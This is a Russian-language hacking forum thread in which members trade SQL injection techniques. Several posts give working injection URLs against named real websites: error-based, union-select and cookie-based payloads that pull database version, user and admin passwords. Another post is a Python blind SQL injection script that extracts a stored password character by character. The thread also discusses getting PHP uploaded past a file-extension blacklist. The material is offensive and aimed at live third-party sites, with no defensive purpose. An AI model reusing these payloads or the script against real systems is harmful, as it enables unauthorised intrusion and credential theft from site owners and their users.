Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    http://www.liftnn.ru/page.php?path=0.25
    там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает

    http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+from+pages+limit+0,1),floor(rand(0)*2))having+min(0)+or+1%23 работает
    http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос

    бруть таблицы либо ищи способ обойтись без точки
     
    1 person likes this.
  2. Optik-Crack

    Optik-Crack New Member

    Joined:
    14 Jun 2011
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
     
  3. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    #17063 ubi, 15 Jun 2011
    Last edited: 15 Jun 2011
  4. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    пробовал group_concat либо limit не выводит ничего
     
  5. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    есть уязвимый сервер, могу заливать все типы файлов кроме:
    $Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','dll','reg') ;

    пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
    сервер под nginx, поэтому htaccess не пойдет
    lfi не нашел
    что можно еще поробовать?
     
  6. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    кусок уязвимого кода

    структура таблицы
    чему должна быть равна переменная $lole для вывода password where username admin?
     
  7. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Должно быть mq = off;
    Попробуй
    Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1

    Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
     
  8. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    inurl:advertisewmz.php
    уязвимый сценарий referals.php, он в той же папке
    спасибо за ответ, попробую завтра
    принтабельные цифры будут 2,9?
     
    #17068 vaddd, 15 Jun 2011
    Last edited: 15 Jun 2011
  9. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19

    Попробуй что нибудь из этого
    Минифак по загрузке php кода вместо картинок
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
     
  11. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Там нет скули.
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    какето?
    http://uzmob.uz/profile.php?mode=viewprofile&u=692'

    Could not update user data.

    DEBUG MODE

    SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3

    UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id =

    Line : 27
    File : usercp_viewprofile.php
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Это не значит, что там есть скуля
     
  14. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    Не могу запустить сплойт.
    Code:
    #!/usr/bin/python
    #-*- coding: utf-8 -*-
    # coded by BlueH4G _http://blueh4g.org_
    import urllib,re
    from time import sleep
     
    def main() :
     chk = re.compile("true_title")
     url_begin="
    http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20("
     url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20asc%20limit%200,1%23"
     result="result : "
     for spos in range(1,14):
      ch=0
      for i in range(1,8) :
       sleep(0.05)
     
     query="select%20substr((select%20lpad(bin(ascii(substr(m_pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order%20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1
       data=urllib.urlopen(url_begin + query + url_end)
       text=data.read()
       if chk.search(text) :
        ch += 2**(7-i)
      result+=chr(ch)
     print result
    main()
    C:\Python27>root.py
    File "C:\Python27\root.py", line 9
    url_begin="
    ^
    SyntaxError: EOL while scanning string literal
     
  15. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5

    попробуй так url_begin="ссылко" или url_begin=" "
    или ваще убери "
     
  16. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    привет, дружище) расскажи в общих словах почему ты даже не удосужился поискать в поисковой системе google по коду ошибки?
    На твой взгляд что значит аббревиатура EOL?
     
    _________________________
  17. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    Гуглил, но не понял как решить проблему.
     
  18. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    Как это раскрутить
    http://www.onradio.gr/play_old.php?id=245+union+AlL+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
     
  19. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Error Based же:
    http://www.onradio.gr/play_old.php?id=245%20or%201%20group%20by%20concat(version(),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%20-
     
  20. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    в чём проблема?

    Code:
    http://www.onradio.gr/play_old.php?id=-245+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+
     
Thread Status:
Not open for further replies.